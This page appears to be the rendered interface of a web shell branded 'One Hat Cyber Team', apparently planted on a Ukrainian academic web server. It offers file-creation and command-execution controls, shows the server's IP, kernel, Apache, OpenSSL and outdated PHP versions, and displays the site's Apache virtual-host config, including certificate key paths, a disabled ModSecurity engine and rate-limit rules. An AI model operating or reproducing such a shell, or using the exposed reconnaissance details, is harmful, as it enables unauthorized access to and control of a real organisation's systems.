One Hat Cyber Team
Your IP :
216.73.216.216
Server IP :
194.44.31.54
Server :
Linux zen.imath.kiev.ua 4.18.0-553.77.1.el8_10.x86_64 #1 SMP Fri Oct 3 14:30:23 UTC 2025 x86_64
Server Software :
Apache/2.4.37 (Rocky Linux) OpenSSL/1.1.1k
PHP Version :
5.6.40
Buat File
|
Buat Folder
Eksekusi
Dir :
~
/
etc
/
httpd
/
vhost.d
/
View File Name :
www.imath.kiev.ua.conf
<VirtualHost *:80> DocumentRoot /var/www/vhost/imath.kiev.ua ServerName www.imath.kiev.ua ServerAlias imath.kiev.ua RewriteEngine On RewriteCond %{HTTPS} off RewriteRule (.*) https://%{HTTP_HOST}%{REQUEST_URI} [R=301,L] # ErrorLog logs/dummy-host.example.com-error_log # CustomLog logs/dummy-host.example.com-access_log common </VirtualHost> #<VirtualHost *:443> # DocumentRoot /var/www/vhost/imath.kiev.ua # ServerName www.imath.kiev.ua # # Redirect / https://imath.kiev.ua/ # ## SSLEngine on ## SSLCertificateFile /etc/letsencrypt/live/imath.kiev.ua/fullchain.pem ## SSLCertificateKeyFile /etc/letsencrypt/live/imath.kiev.ua/privkey.pem # # #</VirtualHost> <VirtualHost *:443> DocumentRoot /var/www/vhost/imath.kiev.ua ServerName www.imath.kiev.ua ServerAlias imath.kiev.ua ErrorLog logs/imath-error_log CustomLog logs/imath-access_log combined ScriptAlias /cgi-bin/ "/var/www/cgi-bin/" <FilesMatch "\.php$"> <If "-f %{REQUEST_FILENAME}"> SetHandler "proxy:unix:/var/opt/remi/php74/run/php-fpm/www.sock|fcgi://localhost" </If> </FilesMatch> AddHandler php74-fcgi .php Action php74-fcgi /cgi-bin/php74.fcgi SSLEngine on SSLCertificateFile /etc/letsencrypt/live/imath.kiev.ua/fullchain.pem SSLCertificateKeyFile /etc/letsencrypt/live/imath.kiev.ua/privkey.pem Header set Access-Control-Allow-Origin "*" </VirtualHost> #<Directory /var/www/vhost/imath.kiev.ua> # Require all denied # ErrorDocument 403 "This site is undergoing maintenance and should return shortly. Thank you for your patience." #</Directory> <Directory /var/www/vhost/imath.kiev.ua/files> AllowOverride All </Directory> <Directory /var/www/vhost/imath.kiev.ua/.well-known/matrix> AllowOverride All Header always set Access-Control-Allow-Origin "*" </Directory> SecRuleEngine Off <LocationMatch "^/"> SecAction initcol:ip=%{REMOTE_ADDR},pass,nolog,id:10000001 SecAction "phase:5,deprecatevar:ip.somepathcounter=1/1,pass,nolog,id:10000002" SecRule IP:SOMEPATHCOUNTER "@gt 60" "phase:2,pause:300,deny,status:429,setenv:RATELIMITED,skip:1,nolog,id:10000003" SecAction "phase:2,pass,setvar:ip.somepathcounter=+1,nolog,id:10000004" Header always set Retry-After "10" env=RATELIMITED </LocationMatch> ErrorDocument 429 "Rate Limit Exceeded"